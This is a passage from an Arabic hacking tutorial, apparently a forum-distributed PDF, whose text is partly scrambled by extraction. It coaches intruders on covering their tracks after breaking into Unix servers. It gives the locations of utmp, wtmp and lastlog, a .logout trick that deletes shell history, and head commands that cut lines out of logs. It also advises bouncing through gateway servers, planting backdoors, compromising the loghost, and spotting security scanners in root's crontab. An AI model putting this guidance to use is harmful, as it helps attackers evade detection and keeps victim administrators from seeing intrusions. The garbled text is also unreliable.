‫ﻗ ﺖﺑﻘﯿ ﺖاوﻧﻼﯾﻦ‪..‬‬ ‫‪-‬ﻛﻢ ﻣﻦاﻟﻮ‬

‫ﻗﻊﻓﻲ ﻧﻔ ﺲ ﻫﺬا ﺎﻟﺨﻄﺎ زﻣﺎن ‪..‬ﻟﻜﻦاﺗﻌﻠﻤ ﺖ ( و‬ ‫ﺘﻰاﻧﺎﻛﻨ ﺖا‬ ‫ﺧﻄﺎ ﯾﻘﻊﻓﯿﻪاﻟﺠﻤﯿﻊﺑﻨﺴﺒﺔ ‪ % ٩٩٫٩‬ﻣﻨﻨﺎ ) ﺣ‬
‫ﻗﺎ ت ‪logfiles‬‬ ‫ﻫﻮاﻧﻚﺗﻤﺴﺢاﻟﻠﻮ‬
‫ﺘ ﺮ ق ﻣﺎﻗﺪ د ﺧ ﻞ ﻋﻠﻰاﻟﻨﻈﺎم ‪..‬اﻣﺎ‬
‫ﺘﻢﺑﺎن ﯾﻌ ﺮ فاﻻدﻣﯿﻦاﻧﻪ ﻫﻨﺎك ﻣﺨ‬ ‫ﻋﻠﻄﻮ ل ‪..‬ﻫﺬا ﻣﺠﺪيﻓﻲ ﺣﺎﻟﺔاﻧﻚ ﻻﺗﻬ‬
‫ﺘ ﺮﻓﯿﻦ ﻋﻠﯿﻚاﻟﺪ ﺧﻮ ل واﻟﺨ ﺮوج دونان ﯾﻼ ﺣﻈﻚاي ﺷﺨ ﺺ ‪ ..‬دون ﺎنﺗﻘﻮم‬ ‫ﺘﻐ ﻞ ﺷﻐ ﻞاﻟﻤ ﺤ‬ ‫اذاارد تانﺗﺸ‬
‫ﺘﺒﺎه ﻣﺪﯾ ﺮاﻟﻨﻈﺎم‬‫ﺘﻐﯿﯿ ﺮاي ﺷﺊ ﯾﻠﻔ ﺖاﻧ‬ ‫ﺑ‬
‫ﻮﻟﻌﻤ ﻞ ذﻟﻚﺗﺎﺑﻊ ﻣﻌﻲ ‪:‬‬
‫ﺘﻲ روﺟ ﺖ ﻋﻠﻰاﻧﻬﺎ ﻻﺗﻘﻮمﺑﻤﺴﺢاﻟﻠﻮ قاﻧﻤﺎﺗﻘﻮمﺑ ﺤﺬ ف د ﺧﻮﻟﻚﻓﻬﻲ ﻏﯿﯿ ﺮ ﻣﺠﺪﯾﻪ ﻣﺜ ﻞ‬ ‫ﺘﻤﺪاﻟﺒ ﺮاﻣ ﺞاﻟ‬
‫ﻻﺗﻌ‬
‫ﺑ ﺮﻧﺎﻣ ﺞ‪ZAP (or ZAP2‬‬
‫ﻻﻧﻪ ﯾﻘﻮمﺑﻌﻤ ﻞا ﺻﻔﺎرﻛﺎ ﺧ ﺮﻟﻮ ق ﻣﻜﺎﻧﻚ ﺎﻧ ﺖ و ﻫﺬااﯾ ﻀﺎ دﻟﯿ ﻞ ﻋﻠﻰ وﺟﻮد ﺧﻄﺎ ﺳﯿﻼ ﺣﻈﻪ ﻣﺪﯾ ﺮاﻟﻨﻈﺎم‬
‫ﺎذا ﻋﻠﯿﻚﺑﺎﻟﻘﯿﺎمﺑﺬﻟﻚ ﯾﺪوﯾﺎ ‪..‬‬
‫ﺘﻮزﯾﻌﺎ تاﻟﻘﺪﯾﻤﻪ ﺟﺪا (‬‫ﺘﺜﻨﺎ ءﺑﻌ ﺾ ﺎﻟ‬
‫ﺘﻐﯿ ﺮ وﺗﻌﺪ لﻓﻲا ل ( ‪log files‬ﺑﺎﺳ‬ ‫ﻋﺎدة ﻻﺑﺪانﺗﻜﻮ ت ‪root‬ﻟ‬
‫ﺘﻮزﯾﻊ (‬
‫ﺘﻼ ف ﺎﻟ‬‫ﺘﻠ ﻒﺑﺎ ﺧ‬‫ﺎﻣﺎﻛﻦﺗﻮاﺟﺪ ﻣﻠﻔﺎ تاﻟﻠﻮ ق ( ‪default‬ﺗﺨ‬
‫‪UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log‬‬
‫‪WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log‬‬
‫‪LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log‬‬
‫ﻮﻓﻲﺑﻌ ﺾاﻟﻨﺴ ﺦاﻟﻘﺪﯾﻤﻪ‪home/.lastlog$‬‬

‫ﺛ ﺮا ‪:‬‬
‫ﺘ ﺮكا‬ ‫ﻻﺗ‬
‫=======‬
‫ﻛﺜﯿﯿ ﺮ ﻣﻦ ﺎﻟﻬﺎﻛ ﺮز ﯾﻨﺠ ﺤﻮنﻓﻲ ﻋﻤﻠﯿﺔ ﺣﺬ ف د ﺧﻮﻟﻬﻢ ﻣﻦ ﻣﻠﻔﺎ تاﻟﻠﻮ ق ‪..‬ﻟﻜﻨﻬﻢ ﯾﻨﺴﻮناﻣ ﺮا ﻫﺎﻣﺎ وﻗﺎﺗﻼ !!!‬
‫ﺘﻲﺗﻮﺟﺪ ﻫﻨﺎ‬ ‫و ﻫﻲاﻟﻤﻠﻔﺎ تاﻟ‬
‫‪/tmp and $HOME‬‬
‫ﻮ ﺟﻮدا ل ‪Shell History‬ﻓﻲ ‪ HOME$‬ﻣﺼﺪرﻗﻠ ﻖﻛﺒﯿﯿ ﺮ ‪:‬‬
‫‪History files :‬‬
‫‪sh : .sh_history‬‬
‫‪csh : .history‬‬
‫‪ksh : .sh_history‬‬
‫‪bash: .bash_history‬‬
‫‪zsh : .history‬‬
‫‪Backup Files :‬‬
‫~* ‪dead.letter, *.bak,‬‬

‫‪٥١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻟﻜﻦاﻟ ﺤ ﻞ ﻣﻮﺟﻮداﯾ ﻀﺎﻟﻤﺴﺢا ل ‪History files :‬‬


‫‪mv .logout save.1‬‬
‫‪echo rm -rf .history>.logout‬‬
‫‪echo rm -rf .logout>>.logout‬‬
‫‪echo mv save.1 .logout>>.logout‬‬

‫‪-‬ﺎﻣﻮر و ﺎﺷﯿﺎ ء ﯾﺠﺐﺗﺠﻨﺒﻬﺎ واﻟ ﺤﻈ ﺮ ﻣﻨﻬﺎ‬


‫======================‬
‫ﺘﺨﺪام‬ ‫ﻻﺗﻘﻮماﺑﺪاﺑﻜﺴ ﺮايﺑﺎﺳﻮرداﻻ ﻋﻠﻰ ‪encrypted partition‬ﻛﻤﺎ ﻋﻠﯿﻚ داﺋﻤﺎاﻧ ﺖﺗ ﺤﺬر ﻣﻦاﺳ‬
‫ﺘ ﺮاكاﻟﺠﺎﻣﻌﻪ ﻋﻠﻰ ﺳﺒﯿ ﻞاﻟﻤﺜﺎ ل (‬ ‫ﺘ ﺮاﻛﺎﺗﻚ ( ﺎﺷ‬
‫اﺷ‬
‫ﺘﻬﻰاﻟﺒﺴﺎ ﻃﻪ ﯾﻤﻜﻦان ﯾ ﺮى ﻣﺎﺗﻔﻌﻠﻪ ﻣﺪﯾ ﺮاﻟﺸﺒﻜﻪ ‪ admin‬ﻮ ﻣﻦﺛﻢ ﺳﯿﻌ ﺮ ف ﻣﺎﻟﺬيﺗﻘﻮمﺑﻪ و‬ ‫ﻻﻧﻪﺑﻤﻨ‬
‫ﺘﺨﺪﻣﻬﺎاﻟ ﺦ ‪..‬‬
‫ﺘﻲﺗﺴ‬ ‫اﻟﻤﻠﻔﺎ تاﻟ‬
‫ﺣﺎو ل داﺋﻤﺎانﺗﻐﯿﯿ ﺮاﺳﺎﻣﻲاﻟﺒ ﺮاﻣ ﺞاﻟﻤﺸﺒﻮﻫﻪﻟﺪﯾﻚ ﯾﻌﻨﻲا ﺣﻨﺎاﻟﻌ ﺮب ﺧﺼﻮﺻﺎ ﻏﺎوﯾﯿﻦ ﻧﺴﻤﻲاﺳﻤﺎ ء‬
‫اﺳﺎﻣﻲ ﻣﺨﯿﻔﻪ ﻋﻠﻰاﻟﻔﺎ ﺿﻲ ‪..‬‬
‫ﺘﻲﺗﺴﻤﺢﺑﺎﻟﻌﻤ ﻞاﻟﺨﻠﻔﻲ‬ ‫ﺘ ﺮاﻛﺎ تاوا ل ‪shells‬ﺎﻟ‬ ‫ﺘﺨﺪمﺑﻌ ﺾاﻻﺷ‬ ‫ﻻﺗﻔﻜ ﺮﻓﻲ ﻧﻔﺴﻚﻓﻘﻂ ‪ ..‬ﯾﻌﻨﻲ ﺣﯿﻦانﺗﺴ‬
‫ﺘﺎﻟﻲﺗﻠﻔ ﺖاﻻﻧﻈﺎر !!!‬ ‫‪background‬ﻻﺑﺪانﺗﻌ ﺮ فاﻧﻚﺗﺒﻄﺊ ﻣﻦ ﺳ ﺮﻋﺔاﻟﺴﯿ ﺮﻓ ﺮ وﺑﺎﻟ‬
‫ﺘﺼ ﻞ ﻣﻦاﻟﺸﯿ ﻞ‬ ‫ﺘﻄﺎ ع ‪ ...‬ﻋﻠﻰ ﺳﺒﯿ ﻞاﻟﻤﺜﺎ لاذاارد تانﺗ‬ ‫ﺘﺨﺪم ‪ parametres‬ﻋﻠﻰﻗﺪراﻟﻤﺴ‬ ‫ﺣﺎو لان ﻻﺗﺴ‬
‫ﻗﻊ ﻣﻌﯿﻦاو ﺳﯿ ﺮﻓ ﺮ ﻣﻌﯿﻦﻻﺗﻘﻮمﺑﻌﻤ ﻞاﻻﺗﻲ ‪23 http://www.host.com/ : telnet‬‬ ‫ﻋﻠﻰﺗﯿﻠﻨ ﺖﻟﻤﻮ‬
‫ﺎﻧﻤﺎﺑﺒﺴﺎ ﻃﻪاﺗﺒﻊاﻟﺨﻄﻮا تاﻟﺒﻄﯿﺌﻪ وﻫﻲ‬
‫‪telnet‬‬
‫‪open‬‬
‫‪http://www .host.com/‬‬
‫ﻮ ﻫﻜﺬا ‪..‬‬
‫ﺘﺸﻐﯿ ﻞ )‬‫ﻗ ﺖ ﺳﯿ ﺮﻓ ﺮ ﻣﻌﯿﻦ ﻣﻦاﻻﻓ ﻀ ﻞانﺗ ﻀﻊ ﻋﻠﯿﻪ ‪ backdoors‬ﻣﺨﺼﺼﻪﻟﻨﻈﺎم ﺎﻟ‬ ‫ﺘﺮ‬
‫ﻓﻲ ﺣﺎﻟﺔاﻧﻚا ﺧ‬
‫ﺘ ﺮﻧ ﺖ‬
‫ﻣ ﺶ ‪sub7‬ﻫﻬﻬﻬﻬﻬﻬﻬﻬﻪ ( و ﻫﻲﻛﺜﯿﯿ ﺮه و ﻣﻮﺟﻮده ﻣﺠﺎﻧﺎ ﻋﻠﻰاﻻﻧ‬

‫ﺘﻬﺎ‬‫ﺘﻲ ﯾﺠﺐ ﻣﻼ ﺣﻈ‬ ‫ﺘﻘﻨﯿﺎ تاﻟ ﺤﺪﯾﺜﻪاﻟﻲ ﯾ‬‫ﺎﻟﺠﺰ ءاﻟ ﺮاﺑﻊ ‪:‬اﻟ‬
‫===============================‬
‫‪-‬ﺗﻤﻬﯿﺪ‬
‫*******‬
‫ﺘﻌﺒﺎ ﻣﺎ‬
‫ﺘﻘﻨﯿﺎ ت ﻣ‬
‫ﺘﺨﺪمﻫﺬهاﻟ‬ ‫ﻗﺎ ت ‪ ..‬ﻋﻠﯿﻚانﺗﻌ ﺮ فﻛﯿ ﻒﺗﺴ‬ ‫ﺘ ﺮا‬
‫ﺑﻌﺪانﺛﺒ ﺖاو ل ‪ sniffer‬ﻮ ﺧﻄﻄ ﺖﻟﺒﺪااﻻ ﺧ‬
‫ﯾﻠﻲ ‪:‬‬
‫ﺛ ﺮك ﻣﻦاي ﻧﻮ ع‬ ‫‪-‬ﺎﻣﻨﻊﺗﻘﻔﻰا‬
‫**********************‬
‫ﻗﻊﻟﻜﻦﻫﺬا ﻻﯾﻬﻢ ‪...‬‬ ‫ﺘ ﺮ ق ‪ hacker‬ﻮاﻧﻚا ﻃ ﺤ ﺖﺑﺎ ﺣﺪاﻟﻤﻮا‬ ‫ﻗﺪ ﯾﻼ ﺣﻆ ﺎﻻدﻣﯿﻦ ) ﻣﺪﯾ ﺮاﻟﺸﺒﻜﻪ ( وﺟﻮدكﻛﻤﺨ‬
‫ﺘﻌﺎﻣ ﻞ ﻣﻌﻚ !!!‬‫اﻟﻤﻬﻢﻫﻮاﻧﻪﻛﯿ ﻒ ﺳﯿ ﺮﺻﺪك و ﻋﻨﺪﻫﺎﻛﯿ ﻒ ﯾﻤﻜﻦان ﯾ‬
‫ﺘﺒﻌﻚ و ر ﺻﺪك واﯾ ﻀﺎﻛﯿ ﻒ‬ ‫ﺘﻤﺎﻻ ت واﻻﺳﺎﻟﯿﺐاﻟﺬي ﯾﻤﻜﻦﺑﻬﺎﺗ‬ ‫ﺘﻢﺗﻮ ﺿﯿﺢﻛ ﻞاﻻ ﺣ‬ ‫ﻟﺬاﻓﻔﻲ ﻫﺬااﻟﺠﺰ ء ﺳﯿ‬
‫ﯾﻤﻜﻦانﺗﻤﻨﻌﻬﺎ ‪...‬‬

‫ﺘ ﺮ ق ﻋﻠﯿﻪ‬
‫*ﻣﻦاﻟﻄﺒﯿﻌﻲ )اﻟﻌﺎدي (ان ﯾﺴﻬ ﻞ ﻋﻠﻰ ﻣﺪﯾ ﺮاﻟﺸﻜﺒﻪ ) ) ‪ admin‬ﻣﻌ ﺮﻓﺔاﻟﻨﻈﺎماﻟﺬيﻛﺎناﻟﻤﺨ‬
‫ﺘ ﺮﻛﻬﺎﻛﻤﺎﻫﻲ (او ﻣﻦ‬‫ﺘﻪ و ذﻟﻚاﻣﺎ ﻋﻦ ﻃ ﺮﯾ ﻖ ﻣﻠﻔﺎ تاﻟﻠﻮ ق )ﻫﺬاانﻛﺎناﻟﻬﺎﻛ ﺮ ﻏﺒﻲﻟ‬
‫ﻋﻨﺪ د ﺧﻮﻟﻪ ﻋﻠﻰ ﺷﺒﻜ‬
‫ا ل ‪ output‬ﻣﻦا ل ‪sniffer‬‬

‫‪٥٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘ ﺮ ق ﻣﺎزا ل ﻣﻮﺟﻮدا ‪online‬‬


‫ﺎو ﻣﻦاواﻣ ﺮ ‪netstat‬ﻓﻲ ﺣﺎﻟﺔاناﻟﻤﺨ‬
‫ﺘﺎجا ل !! ‪GateWay Server‬‬ ‫ﻣﻦ ﺎﺟ ﻞ ﻫﺬاﺗﺨ‬

‫ﺘﻲ ﯾﻮﺟﺪﻟﻚ ﺣﺴﺎب‬ ‫‪* A gateway server in between‬ﻫﺬا ﻮا ﺣﺪ ﻣﻦاﻟﻜﺜﯿﯿ ﺮ ﻣﻦاﻟﺴﯿ ﺮﻓ ﺮا تاﻟ‬
‫ﺘﻄﯿﻊﺗﻐﯿﯿ ﺮ‬ ‫ﺘﺴ‬ ‫ﺘﺎج ﻻنﺗﻜﻮن روو ت ﻋﻠﯿﻬﺎﻟ‬ ‫ﺘﺨﺪام واﻧ ﺖﺗ ﺤ‬ ‫ﺘﻬﻰاﻟﺴﺨﺎﻓﻪﻓﻲاﻻﺳ‬ ‫ﺘﺒ ﺮﻓﻲ ﻣﻨ‬ ‫ﺘﻲﺗﻌ‬ ‫ﻋﻠﯿﻬﺎ واﻟ‬
‫ا ل ‪wtmp and lastlogs‬‬
‫ﺘﻢاﻟﻜﺸ ﻒ‬ ‫ﺘﻰ ﻻ ﯾ‬ ‫ﺘﻤ ﺮار ﺣ‬‫ﺘﺨﺪاماﻛﺜ ﺮ ﻣﻦ ‪ gateway server‬ﻮانﺗﺒﺪ لﺑﯿﻨﻬﻢﺑﺎﺳ‬ ‫ﻛﻤﺎاﻧﻪ ﻻﺑﺪان ﻣﻦاﺳ‬
‫ﻋﻨﻚ ‪..‬‬
‫ﺘﺼ ﻞﺑﺎﻟﺴﯿ ﺮﻓ ﺮاﻟﻤ ﺮاد‬ ‫ﺘ ﺮ ق ﻣﻨﻪ ‪..‬ﻗﻢﺑﺎﻻﺗﺼﺎ لﺑﺎ ل ‪ gateway server‬ﻮ ﻣﻦﺛﻢﺗ‬ ‫ﺘﺨ‬‫ﻣﻦاﻟﺸﯿ ﻞاﻟﺬي ﺳ‬
‫ﻗﻪ ‪..‬‬‫ﺘ ﺮا‬
‫اﺧ‬
‫ﺘﻐﯿﯿ ﺮاﻟﻠﻮ ق (‬
‫ﺘﺎج داﺋﻤﺎ ﻞ ‪root access‬ﻟ‬ ‫( >==ﺗ ﺤ‬
‫ﺘﻌﺪﯾ ﻞﻓﻲ ﻣﻠﻔﺎ ت‬ ‫ﺘﺨﺪاﻣﻚ ل ‪ Dialup server‬ﯾﺠﻨﺒﻚاﻟﻜﺜﯿﯿ ﺮ ﻣﻦ ﺎﻟﻤﺸﺎﻛ ﻞ ‪ ..‬ﺣﯿﺚاﻧﻚﻓﻲ ﻏﻨﻰ ﻋﻦاﻟ‬ ‫ﺑﺎﺳ‬
‫ﺘﻠ ﻒﻓﻲﻛ ﻞ ﻣ ﺮهﺗﺪ ﺧ ﻞﻓﯿﻬﺎ ﻋﻠﻰا ل )= ‪hacked system‬‬ ‫ﺘ ﺮاك ﻣﺨ‬‫اﻟﻠﻮ قﺑﺸ ﺮطانﺗﺪ ﺧ ﻞﺑﺎﺷ‬
‫ﺘﺨﺪم ‪hacking‬‬ ‫ﻣﻠ ﺤﻮﻇﻪ ‪:‬اذاﻛﻨ ﺖﻗﺎدر ﻋﻠﻰاﻻﺗﺼﺎ لﺑﺴ ﺮﻓﯿ ﺮا ت ‪dialup‬ﻛﺜﯿﯿ ﺮهﻓﻼ ﺣﺎﺟﻪ ﻻنﺗﺴ‬
‫ﺘﺼ ﻞ ﻣﻦ ﺧﻼﻟﻬﺎ‬ ‫ﺘﻲﺗ‬ ‫ﺘﻠﻔﻪاﻟ‬‫ﺘﻐﯿ ﺮ ﺎﻟﺸ ﺮﻛﺎ تاﻟﻤﺨ‬‫ﺛ ﺮكﺑ‬
‫ﺘﻐﯿ ﺮا‬‫‪server‬ﻻﻧﻪ ﺳﯿ‬

‫ﺘﻰ وانﻗﻤ ﺖﺑﻤﺎ ﺳﺒ ﻖ (‬ ‫ﺘﻘﺪﻣﻪ ( ﺣ‬‫ﺘ ﺤﺪهاﻻﻣ ﺮﯾﻜﯿﻪ واوروﺑﺎ )اﻟﺪو لاﻟﻤ‬
‫ﺘﻮاﺟﺪﯾﻦﻓﻲاﻟﻮﻻﯾﺎ ت ﺎﻟﻤ‬
‫ﺑﺎﻟﻨﺴﺒﻪﻟﻠﻤ‬
‫) ‪dialup servers‬ﯾﻤﻜﻨﻬﻢﺗﺴﺠﯿ ﻞﻛ ﻞاﺗﺼﺎ لﺗﻢ وﻟﺪﯾﻬﻢارﺷﯿﻔﺎ ت ﻣﻨﺬ ﺳﻨﯿﯿﻦ ﻫﺬا ﻋﺪدﻫﺎ !‬

‫ﺘﺎﻟﯿﻪ ‪:‬‬
‫ﺘﺼﺎرﻟﻠﻨﻘﻄﻪاﻟﺴﺎﺑﻘﻪ ﻣﻮ ﺿ ﺤﻪﺑﺎﻟ ﺮﺳﻢﻓﻲاﻟﺼﻮرهاﻟ‬
‫ﺘﯿﺠﻪ وا ﺧ‬
‫ﻧ‬

‫‪-‬ﺎﯾﺠﺎداي ﻧﻮ ع ﻣﻦاﻧﻮا ع ﻣﻠﻔﺎ تاﻟﻠﻮ ق ‪ lOGs‬ﻣﻬﻤﺎﻛﺎنﻓﯿﻬﺎ ﻣﻦﺗﻼﻋﺐ‪..‬‬


‫**************************************************‬

‫***‬
‫ﺘﻰاﻟﻤﺨﻔﻲ ﻣﻨﻬﺎ ‪..‬ﻟﻠ ﺤﺼﻮ ل واﻟﻌﺜﻮر ﻋﻠﻰﻫﺬه‬ ‫ﻣﻦاﻟﻬﺎم ﻮاﻟ ﻀ ﺮوري ﺟﺪاانﺗﻌﺜ ﺮ ﻋﻠﻰﻛ ﻞ ﻣﻠﻔﺎ تاﻟﻠﻮ ق ﺣ‬
‫ﺘﯿﻦ ‪:‬‬ ‫اﻟﻤﻠﻔﺎ ت ﯾﻤﻜﻦ ذﻟﻚﺑﻬﺎﺗﯿﻦاﻟﻄ ﺮﯾﻘ‬
‫ﺘﺼﺎر ‪List Open‬‬ ‫ﺘﺨﺪامﺑ ﺮﻧﺎﻣ ﺞ ‪LSOF‬ﻫﻮا ﺧ‬ ‫ﺘﻮ ﺣﻪ ‪ :‬ﻮ ﯾﻤﻜﻨﻚ ذﻟﻚﺑﺎﺳ‬ ‫‪-١‬ﺛ ﺮ ﻋﻠﻰ ﺟﻤﯿﻊاﻟﻤﻠﻔﺎ تاﻟﻤﻔ‬
‫ﺘﻌﺪﯾ ﻞﻓﯿﻬﻢ‬ ‫‪Files‬ﻮ ﻣﻦﺛﻢ ﯾﻤﻜﻦاﻟﻌﺜﻮر ﻋﻠﯿﻬﻢ واﻟ‬
‫ﺘﻲﺗﻐﯿ ﺮ ت ) ﺣﺪ ثﻓﯿﻬﺎﺗﻐﯿﯿ ﺮ ( ﻣﻦﺑﻌﺪ د ﺧﻮﻟﻚ ‪-‬‬ ‫‪ -٢‬ﺣﺚ ﻋﻦﻛ ﻞاﻟﻤﻠﻔﺎ تاﻟ‬
‫ﺑﻌﺪ د ﺧﻮﻟﻚﻗﻢﺑﻌﻤ ﻞ ‪ touch /tmp/check‬ﻮﺑﻌﺪﻫﺎﻗﻢ "‪"find / -newer /tmp/check -print‬‬

‫‪٥٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺎﺋ ﺞ ‪> -‬ﺗﻌﺪﯾ ﻞ‬


‫ﺘﺎﺋ ﺞ ‪> -‬ﻣﻄﺎﻟﻌﺔاﻟﻨ‬
‫ﺘﺎﻟﻲ ‪:‬ﺑ ﺤﺚ ‪> -‬ﻧ‬ ‫ﺘﺎذ خاﻟﺸﻜ ﻞاﻟ‬‫ﺘﻲ ﺳﻨﻘﻮمﺑﻬﺎ ﺳ‬ ‫ﺎﻟﻌﻤﻠﯿﻪاﻟ‬
‫ﺘﯿﺎدﯾﻪ ‪ usr/adm/‬ﻮ ‪ var/adm/‬ﻮ ‪var/log/‬‬ ‫ﺘﺸﯿﻚ ﻋﻠﻰاﻣﺎﻛﻦا ل ‪ log files‬ﺎﻻﻋ‬ ‫ﻗﻢاﯾ ﻀﺎﺑﺎﻟ‬
‫ﺘﻢﺗﺴﺠﯿ ﻞاﻟﻌﻤﻠﯿﺎ تﻓﻲا ل ‪ loghost‬ﯾﻌﻨﻲ ‪xx@loghost‬ﻓﺎﻧ ﺖ ﻫﻨﺎﻓﻲ ﻣﺎز ق ‪ ..‬ﺣﯿﺚاﻧﻪ ﻻﺑﺪ ﻣﻦ‬ ‫ﺎذا ﯾ‬
‫ﺘﻌﺪ ل ﻣﻠﻔﺎ تاﻟﻠﻮ ق‬
‫ﺘ ﺮ قا ل ‪loghost‬ﻟ‬ ‫انﺗﺨ‬
‫ﺘﺎﺑﻪ ‪ text editor‬ﺎوﻗﻢﺑﻌﺪاﺳﻄ ﺮ‬ ‫ﺘﺨﺪاماي ﻣ ﺤ ﺮرﻛ‬‫ﯾﻤﻜﻦﺗﻌﺪﯾ ﻞاﻟﻠﻮ ق ‪logfiles‬ﺑﻌﺪة ﻃ ﺮ قاﺑﺴﻄﻬﺎﺑﺎﺳ‬
‫ﺘﺨﺪام ‪ wc‬ﻮ ﻣﻦﺛﻢ ﺣﺬ فا ﺧ ﺮ ‪١٠‬اﺳﻄ ﺮ ﻣﻦ ﺧﻼ ل‪: "head -‬‬ ‫اﻟﻤﻠ ﻒﺑﺎﺳ‬
‫"‪LineNumbersMinus10‬ﺑﺎﻟﻌ ﺮﺑﻲ ) ﻋﺪداﻟﺴﻄﻮر ﻣﻄ ﺮو ﺣﺎ ‪ ١٠‬ﻣﻨﻪ ) ‪- head‬‬
‫ﺘﺨﺪام ‪acct-cleaner from‬‬ ‫ﺎذاﻛﺎنﺑ ﺮﻧﺎﻣ ﺞ ‪ accouting‬ﻣﺜﺒ ﺖ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮ ﯾﻤﻜﻨﻚﺑﺒﺴﺎ ﻃﻪاﺳ‬
‫‪zhart‬ﻮﻫﻮﻫﯿﻌﻤ ﻞاﻟﻼزم‬

‫ﺘﺨﺪم ‪ wtmpx‬ﻮ ‪ utmpx‬ﺎﯾ ﻀﺎﻓﻤﻊاﻻﺳ ﻒ ﻋﺰﯾﺰاﻧ ﺖﻓﻲ ور ﻃﻪ !!!ﻓﺎﻧﺎ ﻋﻠﻰاﻋ ﺮ ف‬ ‫ﺎذاﻛﺎناﻟﻨﻈﺎم ﯾﺴ‬
‫ﺘﻄﻌ ﺖانﺗﺒ ﺮﻣ ﺞ وا ﺣﺪ )ﻟﻼ ﺧﻮهاﻟﻤﺒ ﺮﻣﺠﯿﻦ (ﻻﺗﻨﺴﻰانﺗﻌﻠﻨﺎﺑﻪ‬
‫ﺘﻌﺎﻣ ﻞﻓﻲﻫﺬهاﻟ ﺤﺎﻟﻪ ‪..‬ﻟﻮاﺳ‬
‫ايﺑ ﺮﻧﺎﻣ ﺞﻟﻠ‬
‫=(‬

‫‪-‬ﺗ ﺤﻘ ﻖ ﻣﻦ‪syslog configuration and logfile‬‬


‫************************************‬
‫ﺘ ﺤﻘ ﻖ ﻣﻦ‬
‫ﺘﺴﺠﯿ ﻞاي ﺷﺊ ﯾ ﺮﯾﺪوﻧﻪ ‪..‬ﻓﻌﻠﯿﻚانﺗ‬ ‫ﺘﻤﺪ ﻣﻌﻈﻢاﻟﺒ ﺮاﻣ ﺞ ﻋﻠﻰا ل ‪syslog function‬ﻟ‬ ‫ﺗﻌ‬
‫ﺧﺼﺎﺋ ﺺا ل ‪syslog‬‬
‫ﻗﺎ ت ‪ logs‬ﻻﺗﺨﺰنﻓﻘﻂ ﻋﻠﻰاﻟﺠﻬﺎزاﻧﻤﺎ ﻋﻠﻰ ‪ hosts‬ﺎ ﺧ ﺮى ‪...‬ﻓﯿﺆﺳﻔﻨﻲ ﺎﻧﻚ ﻻﺑﺪ ﻣﻦ‬ ‫ﻓﺎذاﻛﺎﻧ ﺖاﻟﻠﻮ‬
‫ﺘ ﺮا ق ﻫﺬه‪hosts‬‬‫اﺧ‬
‫ﻣﻠ ﻒا ل ‪ syslog‬ﻣﻮﺟﻮدﻓﻲ‪etc/syslog.conf/‬‬

‫ﺘﻪ‬‫‪-‬ﺗ ﺤﻘ ﻖ ﻣﻦ ﻧﻮﻋﯿﺎ تﺑ ﺮاﻣ ﺞاﻻﻣﻦاﻟﻤﺜﺒ‬


‫******************************‬
‫ﻗﻊ ذا تاﻟ ﺤ ﺲاﻷﻣﻨﻲاﻟﻌﺎﻟﻲ‪ .‬وﺗﺪار ﻫﺬة ﺎﻟﺒ ﺮاﻣ ﺞ‬ ‫ﺗﻮﺟﺪاﻟﻌﺪﯾﺪ ﻣﻦﺑ ﺮاﻣ ﺞاﻟﻔ ﺤ ﺺاﻷﻣﻨﻲ ﻏﺎﻟﺒﺎ ﻋﻠﻰاﻟﻤﻮا‬
‫ﺘ ﺮا ﺿﻲأواﻟﻄﺒﯿﻌﻲﻫﻮ ‪var/spool/cron/crontabs/‬‬ ‫ﺑﻮاﺳﻄﻪأداهﺗﺴﻤﻰ ‪ cron‬ﻮ ﯾﻜﻮن ﻣﻜﺎﻧﻬﺎاﻷﻓ‬
‫ﺘ ﺤﻘ ﻖاﻟﻠﺴ ﺮﯾﻊ ﻣﻦ‬ ‫ﺘﻌﻤﻠﻬﺎ‪.‬ﻟﻠ‬‫ﺘﻲ ﯾﺴ‬ ‫ـ ‪Root‬ﻮ ﺎﻟﻤﻠﻔﺎ تاﻟ‬ ‫ﺘﺎﺑﻌﻪ ﺟﻤﯿﻊاﻟﻤﺪ ﺧﻼ ت ‪ .‬ﺧﺎ ﺻﻪاﻟ‬ ‫ﻮ ﻫﻲﺗﻘﻮمﺑﻤ‬
‫ﺘﺎﻟﻲ‬‫ﺘﺨﺪماﻷﻣ ﺮاﻟ‬ ‫اﻟﻤﻮ ﺿﻮ ع ﻧﺴ‬
‫‪"crontab -l root".‬‬
‫ـ ~‪ bin/‬ﺎﻟﺨﺎ ص‬ ‫ﻏﺎﻟﺒﺎ ﻣﺎﺗﻜﻮنﻫﺬهاﻷدوا ت ﻣ ﺤﻤﻠﻪ و ﻋﺎﻣﻠﻪ ﻋﻠﻰ ﺣﺴﺎب ﺎﻟﻤﺪﯾ ﺮ‪ .‬و ﯾﻜﻮنﺑﻌ ﻀﻬﺎﻓﻲ ﻣﺠﻠﺪاﻟ‬
‫ﺑﻪ‪.‬ﻛﻤﺎ ﯾﻤﻜﻦان ﯾﻜﻮن ﻫﻨﺎك ‪ sinnefer‬ﻣﻮ ﺿﻮ عﻷﻏ ﺮا ضاﻣﻨﯿﻪﻓﻲ ﻧﻔ ﺲاﻟﻤﻜﺎن‪.‬‬
‫ﺘﻌﻤ ﻞﻓﻲ ﻣﺜ ﻞ ﻫﺬهاﻟﻔ ﺤﻮﺻﺎ ت ﺎﻟﺪا ﺧﻠﯿﻪ‬ ‫ﻣﻦاﻷدوا تاﻟ ﺖﺗﺴ‬
‫‪tiger, cops, spi, tripwire, l5,‬‬
‫‪binaudit, hobgoblin, s3 etc.‬‬
